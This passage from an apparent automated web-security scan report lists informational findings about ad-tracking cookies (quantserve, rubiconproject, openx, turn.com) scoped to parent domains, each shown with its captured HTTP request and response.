segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJ7H7+DGglUCAcAECUP/o="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:00:14 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 13:59:54 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304949614+ \"5\": 1304340362+ \"4\": 1304340367}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:14 GMT; Path=/
Content-Length: 508
Set-Cookie: dps2b=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; Max-Age=14400

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://r.nexac.com/e/getdata.xgi?dt=fi&fn=adrider&pkey=tubw72p3ncbzv&repequal=-&reppipe=%26code%3D","javascript"
...[SNIP]...

9.74. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1302356071;fpan=1;fpa=P0-1958234894-1304949604185;ns=1;url=http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel;ref=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1304949604184;tzo=300;a=p-25CIknq_eSg16;labels=MediaServices HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EPgAJe8kjVmM-5GL0ZmY8frRi58oyBABvAEB2gaB9ACa0aOZWBDxiz0cxeKLPR1KLMUgsqNMEf4RDCAMHxCCAg0g4gCdE7tgqRksdDECEYILsywS0zgSggMC4ZShzCW1OfFABNIA6JIA4QC-ILZLEIJIstOUo4sj

Response

HTTP/1.1 302 Found
Connection: close
Location: http://segment-pixel.invitemedia.com/pixel?pixelID=50185&partnerID=134&clientID=5061&key=segment&pb=0
Set-Cookie: d=EPUAJe8kjVmM-5GL0ZmY8frRi58oyBABvQEB2gaB9ACa0aOZWBDxiz0cxeKLPR1KLMUgsqNMEf4RDCAMHxCCAg0g4gCdE7tgqRksdDECEYILsywS0zgSggMC4ZShzCW1OfFABNIA6JIAww0b4gtksQgkiy05SjiyMA; expires=Sun, 07-Aug-2011 14:00:05 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 09 May 2011 14:00:05 GMT
Server: QS


9.75. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4212&nid=1185&put=2931142961646634775&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1185=2931142961646634775; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=154dab7990adc1d6f3372c12^8^1304807875^2915161843; csi2=3204821.js^1^1304807875^1304807875; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1; 
rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C; put_1986=2724386019227846218; cd=false

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1; expires=Wed, 08-Jun-2011 14:00:12 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C519%2C3%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C; expires=Wed, 08-Jun-2011 14:00:12 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=2931142961646634775; expires=Fri, 08-Jul-2011 14:00:12 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

9.76. http://r.openx.net/set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=2931142961646634775 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; s=ff27bad6-6196-4fc3-ac7a-4d20dad87fe5; p=1304949602

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:09 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; expires=Wed, 08-May-2013 14:00:09 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

9.77. http://r.turn.com/r/bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=18&uid=CAESEA4m3NbIVFSubIriNyJB6xg&cver=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwS
KXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJh2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; 
pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; uid=2931142961646634775; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15104%7C15104%7C15104%7C15104%7C15085%7C15104%7C15104%7C15082%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7Cundefined%7C15104%7Cundefined%7C15097%7C15093; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:15 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:15 GMT

GIF89a.............!.......,...........D..;

9.78. http://r.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwS
